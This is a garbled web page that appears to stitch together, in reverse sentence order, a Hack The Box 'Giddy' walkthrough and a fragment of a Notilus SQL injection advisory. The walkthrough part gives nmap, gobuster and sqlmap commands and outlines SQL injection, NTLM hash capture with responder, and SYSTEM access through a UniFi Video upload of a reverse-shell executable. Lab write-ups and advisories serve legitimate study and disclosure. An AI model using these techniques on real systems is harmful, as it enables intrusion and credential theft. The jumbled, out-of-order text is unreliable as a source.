![]() ![]() It is the end user's responsibility to obey all applicable local, state and federal laws. legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. ![]() SQLmap can be used to enumerate the database sqlmap -u -dbms=mssql -dbs The 2nd SQL injection point is the GET parameter field in the product category, we can trigger an SQL error with a single quote also. The 1st SQL injection point is the search field since we can trigger an SQL error with a single quote. !/assets/images/htb-writeup-giddy/(mvc1.png) There’s also a search function that we can use to look in the database. The web application simply lists products from the database. We can register a new user but there’s nothing interesting we can do with a user vs. The /mvc URI is some generic demonstration ASP.NET page with a database backend. The /remote URI contains a Windows PowerShell Web Access interface which we’ll use later. The main page has nothing interesting on it, just some image of a dog. Wordlist : SecLists/Discovery/Web-Content/big.txt gobuster -w SecLists/Discovery/Web-Content/big.txt -t 50 -u.Service Info: OS: Windows CPE: cpe:/o:microsoft:windows |_http-server-header: Microsoft-HTTPAPI/2.0 |_ssl-date: T23:26:04+00:00 -4m41s from scanner time.ĥ985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_ssl-date: T23:26:04+00:00 -4m42s from scanner time.ģ389/tcp open ms-wbt-server Microsoft Terminal Services | ssl-cert: Subject: commonName=PowerShellWebAccessTestWebSite Nmap scan report for giddy.htb (10.10.10.104)Ĩ0/tcp open http Microsoft IIS httpd 10.0Ĥ43/tcp open ssl/http Microsoft IIS httpd 10.0 A reverse shell executable is compiled, uploaded and executed to get SYSTEM access.The Ubiquiti Unifi Video service has weak file permissions and allow us to upload an arbitrary file and execute it as SYSTEM.The credentials are used to gain access to a restricted PS session through the Web Powershell interface.Using the SQL injection in MSSQL, we can trigger an SMB connection back to us and get the NTLM hash with responder.py.There’s an SQL injection in the generic products inventory page.Ubiquiti UniFi Video 3.7.3 - Local Privilege Escalation.I learned a bit about Web powershell while doing this box as I didn’t know that even existed. ![]() For this one we need to find an easy SQL injection point in the web application then leverage this to trigger an SMB connection back to our machine and use responder to capture some hashes. Patch to latest available 2012 R3 branch or upgrade to version 2016.Giddy from Hack the Box is being retired this week so I’ll go over the steps to pwn this box. Vulnerable parameter: Advisory Timeline:ġ5/02/16 - First Contact: vendor requests details of vulnerabilityĠ3/03/16 - Follow up to vendor to inquire about availability of a fix.Ġ3/03/16 - vendor responds that fix will be available 16/03/16. The Notilus software is vulnerable to SQL injection attacks, specifically in the password modification fields. We publish the Notilus solution, a simple efficient software to manage the entire business travel process: travel orders, online and offline booking, expense reports, supplier invoices, car fleet, mobile telephones, etc." "DIMO Software is the European leader on the Travel and Expense Management market. Notilus travel solution software v2012 R3 Vulnerability Type: Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') Product: Notilus travel solution software Change Mirror Download Exploit Title: Notilus SQL injection ![]()
0 Comments
Leave a Reply. |